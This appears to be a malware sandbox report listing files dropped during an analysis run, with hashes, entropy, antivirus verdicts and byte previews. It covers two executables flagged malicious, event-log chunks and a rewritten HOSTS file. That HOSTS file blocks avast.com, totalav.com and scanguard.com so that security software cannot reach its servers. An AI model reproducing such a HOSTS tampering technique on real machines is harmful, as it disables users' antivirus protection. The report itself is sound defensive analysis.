                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\LicSend.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):155136
                                                                                                  Entropy (8bit):7.7612316741526906
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:8QpsuldSMGh+tWWP286pB7YnaEV2d77rRzCLghAaeSdk4cXjU8D5BCG3MSrOUhEa:8QpsuldSMGh+288BYTOVCUhAL4ajlHCc
                                                                                                  MD5:9DE1DECE6C8E92D128133FC779F07AD3
                                                                                                  SHA1:02CC6BD7775D7D024DB6E5AE3DAFE9F8FF001ECB
                                                                                                  SHA-256:3C6AC3153ECB32704D9CD808BFA8872275DD7ED0A49E9709A55FC3511A0AAC4B
                                                                                                  SHA-512:CB1E68792F6BA2994AE30482D6316EE04BFDAC72B8CCCC190BF1F0680D72E59A201732C934D918EA987DD966F0FB8A66100ABFBE27CA4506EDFBF5DF747D4558
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 75%
                                                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$........1a..P...P...P...;...P...;...P...P...P..,)...P..,)...P...P...P..,)...P..Rich.P..........PE..d.....[c.........."..........H......8..........@..........................................`.................................................PK.......`...%...P..x...................8I..8............................................0...............................text............................... ..`.rdata.......0... ..................@..@.pdata..x....P.......6..............@..@.rsrc....%...`...&...8..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\LicCheck.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):831814656
                                                                                                  Entropy (8bit):7.999850762854944
                                                                                                  Encrypted:true
                                                                                                  SSDEEP:
                                                                                                  MD5:60EF19D1B9B74D6AAD6007EBBF88CDF3
                                                                                                  SHA1:168F806935D7C826F3F8DE5B9815EA4E16A2D41A
                                                                                                  SHA-256:9233825426E8D6CA1002B61E0D989A732640C5EC546DE9D0382D76D8944389AB
                                                                                                  SHA-512:EEBCBBCC233B70CBBE418EF749B13A0650614B3B2FE7BB7524C3C7A1A33230EFAF86408E3A3C2D1FC1401F08A6D224A5F0F7F4C2264E6CD9F76857F69CFA9A53
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Q...Q...Q.....\...........G.......@.......G.............Z...Q...&.......T...../.P.......P...RichQ...........................PE..L...Ru.c...............".<...H.......S.......P....@.......................................@..................................E..x....p...........................%.. ...8...........................`...@............P...............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data........P.......@..............@....rsrc........p.......T..............@..@.reloc...%.......&...V..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):2.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:v7:D
                                                                                                  MD5:B5D62AA6024AB6A65A12C78C4C2D4EFC
                                                                                                  SHA1:31BBE8B6473B6F9ED5B03F8D8D1994A77A36D355
                                                                                                  SHA-256:1D4F494A87064D8F179D07E3A85B9C87491DE1AF7BD5B06E9DB33C0C735D045F
                                                                                                  SHA-512:83F4B5A2F51D1CD016250366A79912F282D57047AA3B9E825B4874CC21462C06DC9E5C1528C1FDFB7978C4E98142C4A62CDE495C58D2A3C4C4D638FEFA98C2AD
                                                                                                  Malicious:false
                                                                                                  Preview:7904
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:NlllulNl/lh:NllUNt
                                                                                                  MD5:2D7F0F1AAE8DE3A839C161015FFE9AF9
                                                                                                  SHA1:8CBCE934935F336132CE2486924F77532032E499
                                                                                                  SHA-256:459CBF555246AC8C93A031BAD431921CC6D2D1F6963710878FAC55F2C256748B
                                                                                                  SHA-512:EB90C32582BC3269F0196C5B5EF268BA635B6E5D12B5CC24B8DAC4DBD9F080AE010D326F1307882C5B528AE0B2BC5411C69E5ACB08F76A1508F17A3F908506EB
                                                                                                  Malicious:false
                                                                                                  Preview:@...e.................................b.%............@..........
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\LicSend.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3755
                                                                                                  Entropy (8bit):4.260594595712815
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:vDZEurK9XiCW1Ri4qun5Asxp7phxFyA6JJxBXk:RrK96
                                                                                                  MD5:6F0DC39B7450E61940780F3CC3C445EC
                                                                                                  SHA1:C79089A0004C821B8830DBC498FC7A52FC493998
                                                                                                  SHA-256:FDC51A315BCE4DB94D38441B394234A14E9E246626A8ED7A65F9B8332DA6C736
                                                                                                  SHA-512:B1A369B4A3E8D157481988F082554315465A0A5DB0EBC3650A3230A72D232DF04B38E0F3E23BD10F8568DED6E4E41473451D3C9A22F1F5F9B5A3D9A7CA6EEDB1
                                                                                                  Malicious:true
                                                                                                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.065306333939132
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:wapbQZUE1lA6vOUZucxvbNp8CCeoc0ZbU2AjQwEPnPK0xv:7bQZUE1lTkctNp8/cWU2Ajs7
                                                                                                  MD5:CFA5D8C6778D2B28A5EDD415FDFB2232
                                                                                                  SHA1:26B1ED0244515D36098AF2363554D8673BA194E3
                                                                                                  SHA-256:FF05822113A49201F483153EA68D4A1468A73E14D73117356C00D6E33F441E6B
                                                                                                  SHA-512:CF2317DEDFADEC0B5251115CECA90C8CE9A02E46E933BB57DDB494B5B28CD40BC84A188671671AD667043C9F9A7801FECF54DDBB7EDF39DDC28C881B5D97EE8B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.................r.......s...........X...0...0.......................................................................L`.i............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...................................................................&...............................................~...**..X...r.........-.............D.&.........D..T.Xb.L............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.1675229063765946
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ghe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842kT:gVUHiapX7xadptrDT9W84L
                                                                                                  MD5:48126DCE733737985BD110BB2088DC69
                                                                                                  SHA1:3DB620414045613C995B0B2CF6ED565494507883
                                                                                                  SHA-256:E0F449BD165504648633CCE810BFC7ED54065BB9CF104DB61636CD2A7B1C1456
                                                                                                  SHA-512:FEE7012A7768B83DB4327EF7661E301D06A6A381FAD083091488B9EB4A6A89239D07FBB10B1D3C0B63258290EC78FDFBD2FD846E7F33088FEE3F01C62AD5B80B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........1...............1...........p.................................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):2.010692427789071
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                                                                  MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                                                                  SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                                                                  SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                                                                  SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.178337740828219
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:HhfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVM:Hhfrst
                                                                                                  MD5:B4371846E14FE005588B824811B79612
                                                                                                  SHA1:D1C96C41056FBD1553672AECE269D5531C9AF09F
                                                                                                  SHA-256:85FC60BA29FC413B00226720EE0332001F3807B6D8272231B7B884350E307F64
                                                                                                  SHA-512:72AC4D904F4753707669D5EE7E356EEDA928FD1B549B242E76BBAB6852952C34009C504AE8F1CE7562A4394E269EE49AA16E2D1D23CE41EEABD2467119E043E3
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk...............................................82.....................................................................&..................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.. .............k...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.428043971814917
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ChTm5mcVmNQemomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:CJqD6CL49mVpgwQFQ
                                                                                                  MD5:103F7E7E848D4ADE87AACB679E86AFEC
                                                                                                  SHA1:FFDA8B4682F7FF10203C99CE318B61A7161B9F93
                                                                                                  SHA-256:75D0A859AF69BC87BF805A2E5992CFCD925C7FB4C3192EDF76970950AA305D9B
                                                                                                  SHA-512:6F82E8008A264B942A1C8BF1A5303EB6D6CE8520930A78A117E7FEDB6C0F2D5837FC78D7CCCB7C495BB68FDC821AB31131578E52CC328900F77D9F2B5D29D64E
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk..!.......!.......!.......!..................Xa.p.....................................................................mp.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.3522757798397909
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:M5WNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHyNdHLP7jM8ckH58ykHc:MNVaO8sMa3Z85ZML8rjjh3Z85Zu
                                                                                                  MD5:F6AF6BF78202C4DC66CA95D5A01AA34B
                                                                                                  SHA1:3FECE6D384F58D7EF51855BEABF89302931E32D0
                                                                                                  SHA-256:385A80DADB7D7F812F8551B5BF79FE5F665F58F1401558F65121F56C929D7918
                                                                                                  SHA-512:6F1269A6EB924318AD41E2576F3203B4C048AD241D28EC1AFF7643EB480415B0939F6F7C81B20A42C8749D534DAEAB4745F09B1B574CF5672C8DBC58D7836BD0
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................p........u.m.....................................................................`.T............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.014860518194814
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                                                                  MD5:4FB8E2CF8B3F20534836684947962DC2
                                                                                                  SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                                                                  SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                                                                  SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.15655690871689
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                                                                  MD5:2DE60575CB719BF51FAB8A63F696B052
                                                                                                  SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                                                                  SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                                                                  SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72208
                                                                                                  Entropy (8bit):2.260571874353449
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:qoEoaywoRoayIoFoayroeoayEoxoayWhdo69CcoTorNorWorbvorTorZorQorNov:kDCYy
                                                                                                  MD5:7DF71309776F368DE2BB0E21C258B6D1
                                                                                                  SHA1:56227E13FCC516E5AB674E6A4E23C8FFA7A15D95
                                                                                                  SHA-256:FE09C8FB11B883520EC2CBF380343B517051E9F435579263344CE818BF167A4D
                                                                                                  SHA-512:4D4C5A24AF56BECFD5F3CA0AC0B7E292B73655C248B669514D22933290362453F0AFCA3D521853742C27CD5AD30E2730664056CFE4626208127E72856B7FAF99
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........)...............)...........Hb...d..U[.........................................................................4................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...... .........................$..............................................................>.......V...7.!..o.......................&O......(O....L...P... ....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`=/..................l...............K.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.8524226245257144
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                                                                  MD5:B8E105CC52B7107E2757421373CBA144
                                                                                                  SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                                                                  SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                                                                  SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.8432997252442703
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                                                                  MD5:39EE3557626C7F112A88A4DE12E904C1
                                                                                                  SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                                                                                  SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
